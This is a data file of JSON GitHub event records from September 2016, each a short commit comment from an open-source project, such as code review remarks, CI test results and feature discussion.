{"id":"4545026351","type":"CommitCommentEvent","actor":{"login":"backdrop-ci"},"repo":{"name":"backdrop/backdrop"},"payload":{"comment":{"id":18975608,"position":null,"line":null,"path":null,"commit_id":"3c48e11baa65924f5e4f0fd791daec8e0cd7e1a9","created_at":"2016-09-11T01:20:59Z","updated_at":"2016-09-11T01:20:59Z","body":"Related to: backdrop/backdrop-issues#1924 "}},"created_at":"2016-09-11T01:20:59Z"}
{"id":"4545026654","type":"CommitCommentEvent","actor":{"login":"bbondy"},"repo":{"name":"brave/electron"},"payload":{"comment":{"id":18975609,"position":null,"line":null,"path":null,"commit_id":"6ca4e20d519a447b2c9907584b9d58facc94f1a4","created_at":"2016-09-11T01:21:15Z","updated_at":"2016-09-11T01:21:15Z","body":"++\r\n"}},"created_at":"2016-09-11T01:21:15Z"}
{"id":"4545027454","type":"CommitCommentEvent","actor":{"login":"masterpowers"},"repo":{"name":"LaraDock/laradock"},"payload":{"comment":{"id":18975610,"position":null,"line":null,"path":null,"commit_id":"740b4647a3b59f316a9890f46d4842115130fe52","created_at":"2016-09-11T01:22:08Z","updated_at":"2016-09-11T01:22:08Z","body":"yup git checkout develop was used cause the time use it on digital ocean , laravel 5.3 is still not yet release..."}},"created_at":"2016-09-11T01:22:08Z"}
{"id":"4545030206","type":"CommitCommentEvent","actor":{"login":"mdsitton"},"repo":{"name":"OpenRhythm/OpenRhythm"},"payload":{"comment":{"id":18975615,"position":39,"line":60,"path":"src/core/audio/codecs/vorbis.cpp","commit_id":"cf0cc3a7aef8e696fc0c5d8d6024e467e90a39f9","created_at":"2016-09-11T01:24:43Z","updated_at":"2016-09-11T01:24:43Z","body":"Why did you switch all of these back to use underscore_case when we discussed this already?"}},"created_at":"2016-09-11T01:24:43Z"}
{"id":"4545030958","type":"CommitCommentEvent","actor":{"login":"yuan78"},"repo":{"name":"yinqiwen/gsnova"},"payload":{"comment":{"id":18975617,"position":null,"line":null,"path":null,"commit_id":"54e857c7c7e1b7996f88d075b0b1ec2a9d1d2361","created_at":"2016-09-11T01:25:28Z","updated_at":"2016-09-11T01:25:28Z","body":"Have imported fakecert, but the browser Chrome still report https error of\n\"your link is not a private link\"\n\n2016-09-10 23:40 GMT+08:00 yinqiwen <notifications@github.com>:\n\n> Add your ip into hosts.json. For gae, u should configure your ip for '*.\n> appspot.com' .\n>\n> For fakecert issue, u must import the 'Fake-ACRoot-Certificate.cer' into\n> your os's root CA to avoid the warnings of browsers, u can follow 12306's\n> guide to import a root CA file. (12306 force u to import it's root CA file\n> if u want to use it's service.)\n>\n> u can generate the facecert files by openssl's command line tools, but\n> it's complicated and i'm not remember how to do it now, can not give any\n> advice.\n>\n> —\n> You are receiving this because you commented.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/yinqiwen/gsnova/commit/54e857c7c7e1b7996f88d075b0b1ec2a9d1d2361#commitcomment-18974012>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AK_y78F4q51vGBuBjmWYsGZI0uNCwYwiks5qos9hgaJpZM4J5oQB>\n> .\n>\n"}},"created_at":"2016-09-11T01:25:28Z"}
{"id":"4545031345","type":"CommitCommentEvent","actor":{"login":"johanperezrd"},"repo":{"name":"kadirgun/coffee"},"payload":{"comment":{"id":18975619,"position":null,"line":null,"path":null,"commit_id":"69ecbb45022b9dad15d2c03ba322b7177643e66a","created_at":"2016-09-11T01:25:53Z","updated_at":"2016-09-11T01:25:53Z","body":"Hello Kadir"}},"created_at":"2016-09-11T01:25:53Z"}
{"id":"4545031498","type":"CommitCommentEvent","actor":{"login":"mdsitton"},"repo":{"name":"OpenRhythm/OpenRhythm"},"payload":{"comment":{"id":18975620,"position":5,"line":38,"path":"src/core/audio/codecs/vorbis.hpp","commit_id":"c7f7629b34ba988e2cff34a8390d7d45105971f5","created_at":"2016-09-11T01:26:00Z","updated_at":"2016-09-11T01:26:00Z","body":"again from the last commit why underscore naming here?"}},"created_at":"2016-09-11T01:26:00Z"}
{"id":"4545035550","type":"CommitCommentEvent","actor":{"login":"mdsitton"},"repo":{"name":"OpenRhythm/OpenRhythm"},"payload":{"comment":{"id":18975622,"position":43,"line":143,"path":"src/core/audio/output/soundio.cpp","commit_id":"c7f7629b34ba988e2cff34a8390d7d45105971f5","created_at":"2016-09-11T01:29:41Z","updated_at":"2016-09-11T01:29:41Z","body":"So i think the best place for the channel count and other similar things once we get it setup is in the stream object."}},"created_at":"2016-09-11T01:29:41Z"}
{"id":"4545035593","type":"CommitCommentEvent","actor":{"login":"covers1624"},"repo":{"name":"TheCBProject/CodeChickenLib"},"payload":{"comment":{"id":18975623,"position":null,"line":null,"path":null,"commit_id":"578cd3b909cab5635e0cc148f25e7b3da4836ddf","created_at":"2016-09-11T01:29:44Z","updated_at":"2016-09-11T01:29:44Z","body":"I have some thaughts on that.. but it will be extremely difficult..."}},"created_at":"2016-09-11T01:29:44Z"}
{"id":"4545036969","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":18975626,"position":null,"line":null,"path":null,"commit_id":"50eb42de69d2e3c133c34e82b2acaeb5b8a8a791","created_at":"2016-09-11T01:30:56Z","updated_at":"2016-09-11T01:30:56Z","body":"fix_gcc48_ICE (Unknown) - x86_64-MacOS-10.9-clang: OK (2327 of 2328 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-50eb42de69d2e3c133c34e82b2acaeb5b8a8a791-x86_64-MacOS-10.9-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-50eb42de69d2e3c133c34e82b2acaeb5b8a8a791-x86_64-MacOS-10.9-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.96%25-yellow.svg)</a> \n"}},"created_at":"2016-09-11T01:30:56Z"}
{"id":"4545037998","type":"CommitCommentEvent","actor":{"login":"PeratX"},"repo":{"name":"iTXTech/PocketMine-MP"},"payload":{"comment":{"id":18975629,"position":null,"line":null,"path":null,"commit_id":"5efab01fba57506e311b15d62eb09ed74dc03e7b","created_at":"2016-09-11T01:32:05Z","updated_at":"2016-09-11T01:32:05Z","body":"Nice for implementing AttachableBlock"}},"created_at":"2016-09-11T01:32:05Z"}
{"id":"4545041162","type":"CommitCommentEvent","actor":{"login":"zacharyacutey"},"repo":{"name":"JoinRajuncraftNow/Projects"},"payload":{"comment":{"id":18975646,"position":null,"line":null,"path":null,"commit_id":"b0848810b71bda3b651589fec3003d63a31d0bcd","created_at":"2016-09-11T01:35:20Z","updated_at":"2016-09-11T01:35:20Z","body":"@JoinRajuncraftNow\r\nHELLO? I WANT TO KNOW!!!!"}},"created_at":"2016-09-11T01:35:20Z"}
{"id":"4545041535","type":"CommitCommentEvent","actor":{"login":"hintss"},"repo":{"name":"tumblr/policy"},"payload":{"comment":{"id":18975648,"position":null,"line":null,"path":null,"commit_id":"10a83db20735bd930f6dc2a6ab4dca4299b800bf","created_at":"2016-09-11T01:35:44Z","updated_at":"2016-09-11T01:35:44Z","body":"Sure, but that has nothing to do it this diff\n\nOn Sat, Sep 10, 2016, 17:42 bokatan <notifications@github.com> wrote:\n\n> Tumblr said to respect the IP of the creators. My account was reported for\n> sharing an image from another platform that is FAN ART and I was told that\n> my account would get deleted because I shared it.\n>\n> FAN ART is when you take your fave subject matter and create art. For\n> example, you like Star Wars and you create fan art of your fave main\n> characters. While you took your hard time to create the art, you do NOT OWN\n> INTELLECTUAL PROPERTY on your fave characters and you are OWED NOTHING for\n> the image other than LABOR to create the image. DEMANDING ATTRIBUTION is\n> irrelevant because you do not own the intellectual property copyright of\n> the FAN ART... That's how it is right now.\n>\n> —\n> You are receiving this because you commented.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/tumblr/policy/commit/10a83db20735bd930f6dc2a6ab4dca4299b800bf#commitcomment-18975540>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AAzxIwW1aeiUPmaUjcEQsAezQgGIJBV0ks5qo057gaJpZM4J4Zx8>\n> .\n>\n"}},"created_at":"2016-09-11T01:35:44Z"}
{"id":"4545044993","type":"CommitCommentEvent","actor":{"login":"panlanfeng"},"repo":{"name":"panlanfeng/RFlavor.jl"},"payload":{"comment":{"id":18975655,"position":20,"line":20,"path":"src/rep.jl","commit_id":"544938fa9ecb172852d20dc2a67945e23c6618bc","created_at":"2016-09-11T01:39:27Z","updated_at":"2016-09-11T01:39:27Z","body":"See the [recent change](https://github.com/panlanfeng/RFlavor.jl/blob/8ea31aa95cd424bb29bd96a6954a7fcb392bba2b/src/rep.jl#L39).\r\nNow `rep(1:4, 1:4) == rep(1:4, lengths=1:4)` and `rep(1:4, 2)==rep(1:4, times=2)`.\r\n\r\nI didn't make it to be the same with R since there is an inconsistency in R definition. The `times` arguments has very different meanings.\r\n\r\n"}},"created_at":"2016-09-11T01:39:27Z"}
{"id":"4545047195","type":"CommitCommentEvent","actor":{"login":"aldenml"},"repo":{"name":"frostwire/frostwire"},"payload":{"comment":{"id":18975658,"position":57,"line":238,"path":"android/src/com/frostwire/android/util/SystemUtils.java","commit_id":"83929d9e77152739a49d713bda1d32921987d87a","created_at":"2016-09-11T01:41:53Z","updated_at":"2016-09-11T01:41:53Z","body":"Don you think catching `SecurityException` makes sense here?"}},"created_at":"2016-09-11T01:41:53Z"}
{"id":"4545049094","type":"CommitCommentEvent","actor":{"login":"Omega094"},"repo":{"name":"nirvananoob/leetcode"},"payload":{"comment":{"id":18975659,"position":19,"line":19,"path":"python/topological_sorting.py","commit_id":"32dc01a0c532bdf38f5d072621b3d570bd2b1a20","created_at":"2016-09-11T01:43:55Z","updated_at":"2016-09-11T01:43:55Z","body":"强无敌"}},"created_at":"2016-09-11T01:43:55Z"}
{"id":"4545049140","type":"CommitCommentEvent","actor":{"login":"MiCHiLU"},"repo":{"name":"Ceasar/staticjinja"},"payload":{"comment":{"id":18975660,"position":25,"line":417,"path":"staticjinja/staticjinja.py","commit_id":"3476a3977a5dc67b24cd6a9eff874e2cfbc1d35d","created_at":"2016-09-11T01:43:58Z","updated_at":"2016-09-11T01:43:58Z","body":"I seem like a bug. The filters do not work."}},"created_at":"2016-09-11T01:43:58Z"}
{"id":"4545052736","type":"CommitCommentEvent","actor":{"login":"Crunchyroll1"},"repo":{"name":"neetVeritas/pye-module"},"payload":{"comment":{"id":18975665,"position":null,"line":null,"path":null,"commit_id":"0d64c4778e89a6519d6afd172827fa6c607e9ddf","created_at":"2016-09-11T01:47:24Z","updated_at":"2016-09-11T01:47:24Z","body":"also how do u scan for values in c++? i want to make it scan for a value, then store the addresses (basically a self-updating trainer)"}},"created_at":"2016-09-11T01:47:24Z"}
{"id":"4545053183","type":"CommitCommentEvent","actor":{"login":"narayana-java"},"repo":{"name":"narayana-java/Hello-Narayana"},"payload":{"comment":{"id":18975666,"position":1,"line":1,"path":"Hello-test","commit_id":"51f839bc2802e7973f021ece6d409eca6c893923","created_at":"2016-09-11T01:47:50Z","updated_at":"2016-09-11T01:47:50Z","body":"No comment"}},"created_at":"2016-09-11T01:47:50Z"}
{"id":"4545053890","type":"CommitCommentEvent","actor":{"login":"illori"},"repo":{"name":"SimpleMachines/SMF2.1"},"payload":{"comment":{"id":18975669,"position":null,"line":null,"path":null,"commit_id":"2f667a06ff4984a665fefc8cdcd9e4e02a385f36","created_at":"2016-09-11T01:48:28Z","updated_at":"2016-09-11T01:48:28Z","body":"#3575 "}},"created_at":"2016-09-11T01:48:28Z"}
{"id":"4545056162","type":"CommitCommentEvent","actor":{"login":"ponta12"},"repo":{"name":"ponta12/GaeProject"},"payload":{"comment":{"id":18975671,"position":null,"line":null,"path":null,"commit_id":"5750a00dcda37e3464cde0b84f23ef9595e8d964","created_at":"2016-09-11T01:50:51Z","updated_at":"2016-09-11T01:50:51Z","body":"수정 커밋"}},"created_at":"2016-09-11T01:50:51Z"}
{"id":"4545061345","type":"CommitCommentEvent","actor":{"login":"jwagenleitner"},"repo":{"name":"apache/groovy"},"payload":{"comment":{"id":18975680,"position":43,"line":43,"path":"src/main/org/apache/groovy/metaclass/Realm.java","commit_id":"9be5459c906ba106f235d40ebe0f25b7193a0467","created_at":"2016-09-11T01:56:19Z","updated_at":"2016-09-11T01:56:19Z","body":">as for the header... looks like we have a misconfiguration in our build then, since I am using what is defined by the gradle build.\r\n\r\nI fixed up the header for Idea projects in the build a while back, not sure about the Eclipse settings.  But to pick up the new Idea settings would probably require a `./gradlew cleanIdea jar idea`.\r\n\r\n>As for the missing <?>, yeah, that can be added. Frankly it is not of any real use, but well, doesn´t hurt either.\r\n\r\nI hesitated to bring that up as I don't want to look like I'm nit-picking. :smile:  Just thought that in new code it's good to not use raw types if it can be helped even if in most places it's just a Object or a wildcard. And I missed the ClassValue on the rhs was missing the `<MetaClass>` type argument.\r\n\r\n>Realm should be more understood as a replacement for MetaClassRegistry. ClassInfo and MetaClass I want to merge into one structure.\r\n\r\nAh, that makes sense, especially after re-reading your post [Thoughts about the new meta class system MOP 2] (http://blackdragsview.blogspot.com/2015/03/thoughts-about-new-meta-class-system.html).  I think favoring immutability and heading away from inheritance towards composition will work nicely and would hopefully make keeping method/property resolution strategies more in sync.\r\n"}},"created_at":"2016-09-11T01:56:19Z"}
{"id":"4545576601","type":"CommitCommentEvent","actor":{"login":"snicolet"},"repo":{"name":"pb00068/Stockfish"},"payload":{"comment":{"id":18976653,"position":null,"line":null,"path":null,"commit_id":"c34ff5e132e1a75f4de1fa277cb523739a39c08c","created_at":"2016-09-11T10:02:52Z","updated_at":"2016-09-11T10:02:52Z","body":"Congrats, and thanks for taking the time for the explanations :-)"}},"created_at":"2016-09-11T10:02:52Z"}
{"id":"4545577461","type":"CommitCommentEvent","actor":{"login":"Salamandar"},"repo":{"name":"OpenRhythm/OpenRhythm"},"payload":{"comment":{"id":18976654,"position":39,"line":60,"path":"src/core/audio/codecs/vorbis.cpp","commit_id":"cf0cc3a7aef8e696fc0c5d8d6024e467e90a39f9","created_at":"2016-09-11T10:03:36Z","updated_at":"2016-09-11T10:03:36Z","body":"Hm, I was just tired and searching the bug, gonna change it back :p"}},"created_at":"2016-09-11T10:03:36Z"}
{"id":"4545578413","type":"CommitCommentEvent","actor":{"login":"kashike"},"repo":{"name":"DemonWav/MinecraftDevIntelliJ"},"payload":{"comment":{"id":18976655,"position":null,"line":null,"path":null,"commit_id":"2cb65540b20bb4690e6c26aafb719a5f69f2f6d3","created_at":"2016-09-11T10:04:08Z","updated_at":"2016-09-11T10:04:08Z","body":"![cw](http://www.biznessconcepts.com/wp-content/uploads/colorwheel.png)"}},"created_at":"2016-09-11T10:04:08Z"}
{"id":"4545579509","type":"CommitCommentEvent","actor":{"login":"favadi"},"repo":{"name":"favadi/flycheck-gometalinter"},"payload":{"comment":{"id":18976657,"position":null,"line":null,"path":null,"commit_id":"f133f82f7ad37d90f64dec1a517f34dcecffd2b3","created_at":"2016-09-11T10:05:00Z","updated_at":"2016-09-11T10:05:00Z","body":"Fixed in 33cc9c2d7101e0448e5e49e23487c50df163f7db."}},"created_at":"2016-09-11T10:05:00Z"}
{"id":"4545579949","type":"CommitCommentEvent","actor":{"login":"mikeNG"},"repo":{"name":"msm7x30/android_hardware_qcom_display"},"payload":{"comment":{"id":18976659,"position":null,"line":null,"path":null,"commit_id":"beb3d408ff05d9748a8499f789941c7bde3b513a","created_at":"2016-09-11T10:05:21Z","updated_at":"2016-09-11T10:05:21Z","body":"Well semc and huawei were the only active users of this, so I just changed the default stuff. 3.10 is also \"old\" right now since we're working on android-4.4 bringup"}},"created_at":"2016-09-11T10:05:21Z"}
{"id":"4545580069","type":"CommitCommentEvent","actor":{"login":"MakeMeWhite"},"repo":{"name":"MakeMeWhite/makemewhite.github.io"},"payload":{"comment":{"id":18976660,"position":null,"line":null,"path":null,"commit_id":"05002d64fec9a55ab53fd067c85751e2c73add1e","created_at":"2016-09-11T10:05:27Z","updated_at":"2016-09-11T10:05:27Z","body":"revert"}},"created_at":"2016-09-11T10:05:27Z"}
{"id":"4545580359","type":"CommitCommentEvent","actor":{"login":"Salamandar"},"repo":{"name":"OpenRhythm/OpenRhythm"},"payload":{"comment":{"id":18976662,"position":21,"line":17,"path":"src/core/audio/output/soundio.hpp","commit_id":"cf0cc3a7aef8e696fc0c5d8d6024e467e90a39f9","created_at":"2016-09-11T10:05:39Z","updated_at":"2016-09-11T10:05:39Z","body":"Nope, not certain. But it the natural way to avoid unwanted copies of the main instance. I could add a global `SoundioOutput *theSoundIoOutputInstance;` or smth like that, but that wouldn't do the trick."}},"created_at":"2016-09-11T10:05:39Z"}
{"id":"4545581182","type":"CommitCommentEvent","actor":{"login":"ranangi"},"repo":{"name":"ranangi/test_repo_dhanu"},"payload":{"comment":{"id":18976663,"position":null,"line":null,"path":null,"commit_id":"58298730a0cfa72537942f2c51fc47f4e8d446ae","created_at":"2016-09-11T10:06:22Z","updated_at":"2016-09-11T10:06:22Z","body":"test"}},"created_at":"2016-09-11T10:06:22Z"}
{"id":"4545581952","type":"CommitCommentEvent","actor":{"login":"Thrax989"},"repo":{"name":"Thrax989/Project-Phoenix"},"payload":{"comment":{"id":18976664,"position":null,"line":null,"path":null,"commit_id":"f8f6d38931b4a1696f0825302d14a2e2afc6c4a7","created_at":"2016-09-11T10:07:00Z","updated_at":"2016-09-11T10:07:00Z","body":"You will want to set positive Values For The Force Coast So The lightsaber implementation will work correctly needs to be positive for the cpp file to make the negative coast  "}},"created_at":"2016-09-11T10:07:00Z"}
{"id":"4545582758","type":"CommitCommentEvent","actor":{"login":"Salamandar"},"repo":{"name":"OpenRhythm/OpenRhythm"},"payload":{"comment":{"id":18976665,"position":102,"line":94,"path":"src/core/audio/output/soundio.hpp","commit_id":"cf0cc3a7aef8e696fc0c5d8d6024e467e90a39f9","created_at":"2016-09-11T10:07:38Z","updated_at":"2016-09-11T10:07:38Z","body":"Yeah. Again, when a commit contains smth like \"horrible hack\", it's just that I managed to do something/solve a bug but it's a \"temporary\" commit just to save what I did before doing something else/cleaning the code and eventually breaking what I just did ;)"}},"created_at":"2016-09-11T10:07:38Z"}
{"id":"4545583367","type":"CommitCommentEvent","actor":{"login":"beatadelura"},"repo":{"name":"cezaryB/minimo"},"payload":{"comment":{"id":18976666,"position":441,"line":441,"path":"css/normalize.css","commit_id":"9912e7c67716b15cb4561c49046b88a8214fa6f2","created_at":"2016-09-11T10:08:11Z","updated_at":"2016-09-11T10:08:11Z","body":"Brawo! Cieszę się, że nie zapomniałeś o normalize!"}},"created_at":"2016-09-11T10:08:11Z"}
{"id":"4545584267","type":"CommitCommentEvent","actor":{"login":"Thrax989"},"repo":{"name":"Thrax989/Project-Phoenix"},"payload":{"comment":{"id":18976667,"position":null,"line":null,"path":null,"commit_id":"f8f6d38931b4a1696f0825302d14a2e2afc6c4a7","created_at":"2016-09-11T10:08:56Z","updated_at":"2016-09-11T10:08:56Z","body":"Line 209 \r\nhttps://github.com/Thrax989/Project-Phoenix/blob/master/MMOCoreORB/src/server/zone/objects/tangible/component/lightsaber/LightsaberCrystalComponentImplementation.cpp"}},"created_at":"2016-09-11T10:08:56Z"}
{"id":"4545585262","type":"CommitCommentEvent","actor":{"login":"TheDiamondYT1"},"repo":{"name":"minecrafter/voxelwind"},"payload":{"comment":{"id":18976668,"position":null,"line":null,"path":null,"commit_id":"7911d6c0856d68833ee90d3a02e89df35246eea5","created_at":"2016-09-11T10:09:47Z","updated_at":"2016-09-11T10:09:47Z","body":"What about right click block?"}},"created_at":"2016-09-11T10:09:47Z"}
{"id":"4545585794","type":"CommitCommentEvent","actor":{"login":"twer4774"},"repo":{"name":"twer4774/test"},"payload":{"comment":{"id":18976669,"position":null,"line":null,"path":null,"commit_id":"bd82f493894f1a0d9877e25db8390de6d0efc868","created_at":"2016-09-11T10:10:13Z","updated_at":"2016-09-11T10:10:13Z","body":"Refuse"}},"created_at":"2016-09-11T10:10:13Z"}
{"id":"4545586300","type":"CommitCommentEvent","actor":{"login":"Thrax989"},"repo":{"name":"Thrax989/Project-Phoenix"},"payload":{"comment":{"id":18976670,"position":null,"line":null,"path":null,"commit_id":"f8f6d38931b4a1696f0825302d14a2e2afc6c4a7","created_at":"2016-09-11T10:10:41Z","updated_at":"2016-09-11T10:10:41Z","body":"\t\tsetForceCost(MAX(MIN(Math::getPrecision(values->getCurrentValue(\"forcecost\"), 1) * -1, 0), -15));\r\n\r\nAlso To go any higher then 100 You will need to edit the cpp File I have not test this yet for your crystals but im pretty sure the check will negate the integer to 100 Since it checks for a min to max \r\nLine 238 239\r\n\t\t\t\tweapon->setMinDamage(weapon->getMinDamage() - MIN(MAX(getMinimumDamage(), 0), 100));\r\n\t\t\t\tweapon->setMaxDamage(weapon->getMaxDamage() - MIN(MAX(getMaximumDamage(), 0), 100));"}},"created_at":"2016-09-11T10:10:41Z"}
{"id":"4545586742","type":"CommitCommentEvent","actor":{"login":"TimWolla"},"repo":{"name":"WoltLab/WCF"},"payload":{"comment":{"id":18976671,"position":107,"line":107,"path":"wcfsetup/install/files/js/WoltLabSuite/Core/Ui/Redactor/DragAndDrop.js","commit_id":"26c8f1c31c4d5ed3b78d240a0eb18f085162f324","created_at":"2016-09-11T10:11:04Z","updated_at":"2016-09-11T10:11:04Z","body":"Hardcoded english text"}},"created_at":"2016-09-11T10:11:04Z"}
{"id":"4545586793","type":"CommitCommentEvent","actor":{"login":"Salamandar"},"repo":{"name":"OpenRhythm/OpenRhythm"},"payload":{"comment":{"id":18976672,"position":5,"line":38,"path":"src/core/audio/codecs/vorbis.hpp","commit_id":"c7f7629b34ba988e2cff34a8390d7d45105971f5","created_at":"2016-09-11T10:11:06Z","updated_at":"2016-09-11T10:11:06Z","body":"Well that's in my habits to name local variables underscore_case i suppose"}},"created_at":"2016-09-11T10:11:06Z"}
{"id":"4545586900","type":"CommitCommentEvent","actor":{"login":"tank0412"},"repo":{"name":"zf5/android_device_asus_ctp-common"},"payload":{"comment":{"id":18976673,"position":null,"line":null,"path":null,"commit_id":"b7bcdacfa9efddfe9a31f759e34a55418de50b13","created_at":"2016-09-11T10:11:11Z","updated_at":"2016-09-11T10:11:11Z","body":"What? "}},"created_at":"2016-09-11T10:11:11Z"}
{"id":"4545587247","type":"CommitCommentEvent","actor":{"login":"beatadelura"},"repo":{"name":"cezaryB/minimo"},"payload":{"comment":{"id":18976674,"position":3,"line":3,"path":"css/styles.css","commit_id":"9912e7c67716b15cb4561c49046b88a8214fa6f2","created_at":"2016-09-11T10:11:27Z","updated_at":"2016-09-11T10:11:27Z","body":"Masz ustawione w swoim edytorze za duże wcięcia. Ustaw sobie indentacje na 2 spacje i popraw wszędzie w stylach i w html :)"}},"created_at":"2016-09-11T10:11:27Z"}
{"id":"4545588351","type":"CommitCommentEvent","actor":{"login":"dzxx36gyy"},"repo":{"name":"drcoms/jlu-drcom-client"},"payload":{"comment":{"id":18976675,"position":null,"line":null,"path":null,"commit_id":"3a3c5c263efb0901b30322ec95ca15cfbf0c813c","created_at":"2016-09-11T10:12:24Z","updated_at":"2016-09-11T10:12:24Z","body":"经测试这个貌似会login failed\r\n[login] recv 一串数字，然而只有10位，比起之前zhjc1124 PR的那个版本少了好多数据\r\n[login] packet sent.\r\n[login] login failed.\r\n经测试zhjc1123的版本一切正常，这个就只能卡在login failed了，因为不懂python，所以也看不出是啥问题来着\r\n把两个版本做了下对比，貌似可能是mkpkt部分数据构造问题?(因为好像有点差别)\r\n_(:з」∠)_"}},"created_at":"2016-09-11T10:12:24Z"}
{"id":"4545589311","type":"CommitCommentEvent","actor":{"login":"Salamandar"},"repo":{"name":"OpenRhythm/OpenRhythm"},"payload":{"comment":{"id":18976676,"position":43,"line":143,"path":"src/core/audio/output/soundio.cpp","commit_id":"c7f7629b34ba988e2cff34a8390d7d45105971f5","created_at":"2016-09-11T10:13:18Z","updated_at":"2016-09-11T10:13:18Z","body":"Exactly. The way libsoundio works (a pointer on the first element of the channel + an offset between the elements of the channel) seems a correct way to not lose track of what channels we need."}},"created_at":"2016-09-11T10:13:18Z"}
{"id":"4545593306","type":"CommitCommentEvent","actor":{"login":"dtdesign"},"repo":{"name":"WoltLab/WCF"},"payload":{"comment":{"id":18976682,"position":107,"line":107,"path":"wcfsetup/install/files/js/WoltLabSuite/Core/Ui/Redactor/DragAndDrop.js","commit_id":"26c8f1c31c4d5ed3b78d240a0eb18f085162f324","created_at":"2016-09-11T10:16:46Z","updated_at":"2016-09-11T10:16:46Z","body":"Fixed, thanks ;)"}},"created_at":"2016-09-11T10:16:46Z"}
{"id":"4545595288","type":"CommitCommentEvent","actor":{"login":"soteyn"},"repo":{"name":"soteyn/MyDataDev"},"payload":{"comment":{"id":18976684,"position":3,"line":3,"path":"test","commit_id":"470c82cc5da0a34bd0f55dbc578f5c9445365ab7","created_at":"2016-09-11T10:18:34Z","updated_at":"2016-09-11T10:18:34Z","body":"test for submit.\r\ntest for submit again.\r\n123"}},"created_at":"2016-09-11T10:18:34Z"}
{"id":"4545595922","type":"CommitCommentEvent","actor":{"login":"arangholm"},"repo":{"name":"larsommen/deap_sea_crew_scheduling"},"payload":{"comment":{"id":18976685,"position":5,"line":18,"path":"mathematicalModuling/MathematicalModel.tex","commit_id":"5724027af31fd089595d035b35b84ae849155cdb","created_at":"2016-09-11T10:19:10Z","updated_at":"2016-09-11T10:19:10Z","body":"Agree"}},"created_at":"2016-09-11T10:19:10Z"}
{"id":"4545597183","type":"CommitCommentEvent","actor":{"login":"zhongwencool"},"repo":{"name":"zhongwencool/erlang-rock"},"payload":{"comment":{"id":18976687,"position":null,"line":null,"path":null,"commit_id":"9455e8bf3f38fb5df3a379e877ac2eb391cb98bf","created_at":"2016-09-11T10:20:15Z","updated_at":"2016-09-11T10:20:15Z","body":"```erlang\r\n1>supervisor:terminate_child(zoo_sup, fish_keeper).\r\nok\r\n```erlang"}},"created_at":"2016-09-11T10:20:15Z"}
{"id":"4545599021","type":"CommitCommentEvent","actor":{"login":"beatadelura"},"repo":{"name":"cezaryB/minimo"},"payload":{"comment":{"id":18976689,"position":28,"line":28,"path":"index.html","commit_id":"9912e7c67716b15cb4561c49046b88a8214fa6f2","created_at":"2016-09-11T10:21:54Z","updated_at":"2016-09-11T10:21:54Z","body":"Super, że pomyślałeś o responsywności :) Natomiast zasada jest taka, że używamy jak najmiej javascriptu. To co można uzyskać samym cssem to robimy cssem. \r\n\r\nPo pierwsze to użyłeś taga `<picture>`, który jest nie wspierany przez IE11 http://caniuse.com/#search=picture\r\nPo drugie użyłeś biblioteki js. Co tak naprawdę powoduje, że jest więcej kodu i strona będzie się wolniej ładować.\r\n\r\nW tym przypadku wystarczyłoby to zdjęcie użyć jako background i ustawić mu `backround-size: cover;` Będzie ten sam efekt a mniej kodu :)\r\n\r\n"}},"created_at":"2016-09-11T10:21:54Z"}
{"id":"4545599289","type":"CommitCommentEvent","actor":{"login":"arangholm"},"repo":{"name":"larsommen/deap_sea_crew_scheduling"},"payload":{"comment":{"id":18976690,"position":14,"line":39,"path":"mathematicalModuling/MathematicalModel.tex","commit_id":"5724027af31fd089595d035b35b84ae849155cdb","created_at":"2016-09-11T10:22:08Z","updated_at":"2016-09-11T10:22:08Z","body":"Prefer the former formulation, or maybe,\r\n'For all crew positions p_n on a vessel, each position p_i at a point in time t, has its own subdomain of D_it."}},"created_at":"2016-09-11T10:22:08Z"}
{"id":"4545600729","type":"CommitCommentEvent","actor":{"login":"arangholm"},"repo":{"name":"larsommen/deap_sea_crew_scheduling"},"payload":{"comment":{"id":18976691,"position":20,"line":44,"path":"mathematicalModuling/MathematicalModel.tex","commit_id":"5724027af31fd089595d035b35b84ae849155cdb","created_at":"2016-09-11T10:23:12Z","updated_at":"2016-09-11T10:23:12Z","body":"Agree"}},"created_at":"2016-09-11T10:23:12Z"}
{"id":"4545601641","type":"CommitCommentEvent","actor":{"login":"Forlini91"},"repo":{"name":"Forlini91/Empire-Earth---DB-Editor"},"payload":{"comment":{"id":18976693,"position":null,"line":null,"path":null,"commit_id":"b05b517ad3144e8b817dfe83a1f6a970101ea58b","created_at":"2016-09-11T10:23:53Z","updated_at":"2016-09-11T10:23:53Z","body":"I reuploaded near all files, even if not updated, as the local repository was not in sync for some reason."}},"created_at":"2016-09-11T10:23:53Z"}
{"id":"4545602018","type":"CommitCommentEvent","actor":{"login":"sirmordred"},"repo":{"name":"msm7x30/android_hardware_qcom_display"},"payload":{"comment":{"id":18976695,"position":null,"line":null,"path":null,"commit_id":"beb3d408ff05d9748a8499f789941c7bde3b513a","created_at":"2016-09-11T10:24:14Z","updated_at":"2016-09-11T10:24:14Z","body":"You guys are crazy :P even my pc is running ubuntu 14.04 trusty tahr with 3.19 kernel :P"}},"created_at":"2016-09-11T10:24:14Z"}
{"id":"4545602123","type":"CommitCommentEvent","actor":{"login":"Shauren"},"repo":{"name":"TrinityCore/TrinityCore"},"payload":{"comment":{"id":18976696,"position":null,"line":null,"path":null,"commit_id":"40dad022f9e6403bd3ca94b92477ef54111d015c","created_at":"2016-09-11T10:24:18Z","updated_at":"2016-09-11T10:24:18Z","body":"> Load cooldowns from spell_proc table in seconds\r\nThis is a bad change, spell cooldowns are measured in milliseconds (and in 7.0 there are procs that have 1.5 second cooldowns)"}},"created_at":"2016-09-11T10:24:18Z"}
